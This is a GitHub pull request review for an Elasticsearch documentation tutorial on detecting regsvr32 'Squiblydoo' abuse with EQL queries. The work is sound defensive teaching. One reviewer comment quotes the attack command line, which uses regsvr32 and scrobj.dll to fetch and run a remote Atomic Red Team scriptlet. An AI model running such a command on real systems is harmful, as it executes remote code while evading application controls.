### PR TITLE
[DOCS] EQL: Add threat detection example

### PR DESCRIPTION
**Pull request by jrodewig**
Adds a threat detection example tutorial based on the
[`Getting started with EQL` blog post][0].

The example can later be amended when/if support for the `unique` and
`count` pipes are added.

~I plan to map the sample dataset to ECS and update snippets accordingly as part of a follow-up PR.~ (Got this converted)

[0]: https://www.elastic.co/blog/getting-started-eql

### Preview
https://elasticsearch_59105.docs-preview.app.elstc.co/guide/en/elasticsearch/reference/master/eql-ex-threat-detection.html

### CODE REVIEW

**Comment by jrodewig** [comment]
@paulewing @rw-access  Please let me know if any additional security-related context is needed during any of the steps. I was able to follow along with the original blog post pretty well, but it's possible I left something out.

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:320]: @costin does this always get turned into a string?

Comment (costin) [reply docs/reference/eql/detect-threats-with-eql.asciidoc:320]: I believe so - it looks like a bug. Raised https://github.com/elastic/elasticsearch/issues/59707

**Comment by jrodewig** [comment]
@paulewing You mind taking a look at this at your earliest convenience?

I'd love to get this example into the docs for the 7.9 release. Thanks!

**Comment by costin** [comment]
@jrodewig what do you need to get this in for 7.9?

**Comment by jrodewig** [comment]
@costin  I would like to get approval from @paulewing or another security SME before merging.

I'm confident that the EQL queries/functionality work as described. However, my understanding of what the queries describe is second-hand. I'll reach out to see if he can take a look.

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:12]: The ATT&CK taxonomy has slightly changed since this original PR, so this is the new link. They left in redirects though, so the old one still works, but this is where it redirects to.
```suggestion
https://attack.mitre.org/techniques/T1218/010/[regsvr32 misuse] in Windows event
```

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:79]: Should this number be increased, since we already know there are 150?

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:131]: Alternatively, we could do `process where ...` right?
```suggestion
    any where process.name == "regsvr32.exe" and process.command_line != null
```

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:119]:
```suggestion
these events. Append `and process.command_line != null` to the previous EQL query.
```
I think it's also worth mentioning `event.category`, and by switching to `process where ...` you filter by category of `process`

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:116]: I wouldn't say they are false positives, but more that they are superfluous. Like you know all the things that regsvr32.exe did -- it loaded some DLLs, dropped some files, made a network connection. But maybe it's better to show in this example that you want to know _how regsvr32.exe was called in the first place_. That's often the context you want to know when hunting -- where did this come from, and how?

I think by articulating that goal, it makes it more clear why you want to look for the process creation event: it contains `user.name`, which says what user executed the process, as well as `process.parent.name`, so you know where it came from, and `process.command_line`, which gives you information of everything that regsvr32.exe was  told to do. That's why we end up valuing the process creation events so much.

I think if you add those points, it'll add more punch/story and insight into the thought process to the example.

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:140]: This specific variant is called "Squibblydoo." You don't have to include that name, but another pointer back to https://attack.mitre.org/techniques/T1218/010/ could be good here, if you want to "read on for more information"  about how this works.

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:203]: I'll have to have another look at this dataset. I think that event is mapped as `file` when it should be library. I'll see if I can update it for you, and come back to this example.

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:271]: Could add a note that based off the command line we saw earlier (`regsvr32.exe  /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll`) that we expect to find a match.

One reason why you might want to write a sequence here, is that it allows you to write the detection more generically and you don't have to overfit to the command line. The sequence looks for all the things that are suspicious, but they're also generic, so you're more likely to detect future variants as well.

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:277]: Change to however you want to communicate this
```suggestion
. A `regsvr32.exe` process, which could have been used to register malicious
scripts as `scrobj.dll`
. A load of the `scrobj.dll` file by that same process
. Any network event by that same process, which could indicate the download of a remote file
```

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:138]: probably safe to remove

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:146]: I believe this is more technically correct
```suggestion
`process.command_line` value, `regsvr32.exe` used to `scrobj.dll` to register a script.
. This fits the behavior of a
```

File: docs/reference/eql/detect-threats-with-eql.asciidoc
Comment (rw-access) [inline docs/reference/eql/detect-threats-with-eql.asciidoc:210]:
```suggestion
You now know that a `regsvr32.exe` process was used to execute a potentially
malicious script `RegSvr32.sct`. Next, see if `regsvr32.exe` later loads the
```

**Review by rw-access — APPROVED** [review]
LGTM!

**Review by paulewing — APPROVED** [review]
@jrodewig apologies for missing earlier notifications, but this looks awesome! A great tutorial for threat detection with EQL.

**Comment by jrodewig** [comment]
Thanks for your help and reviews @rw-access  and @paulewing!

**Pull request merged**
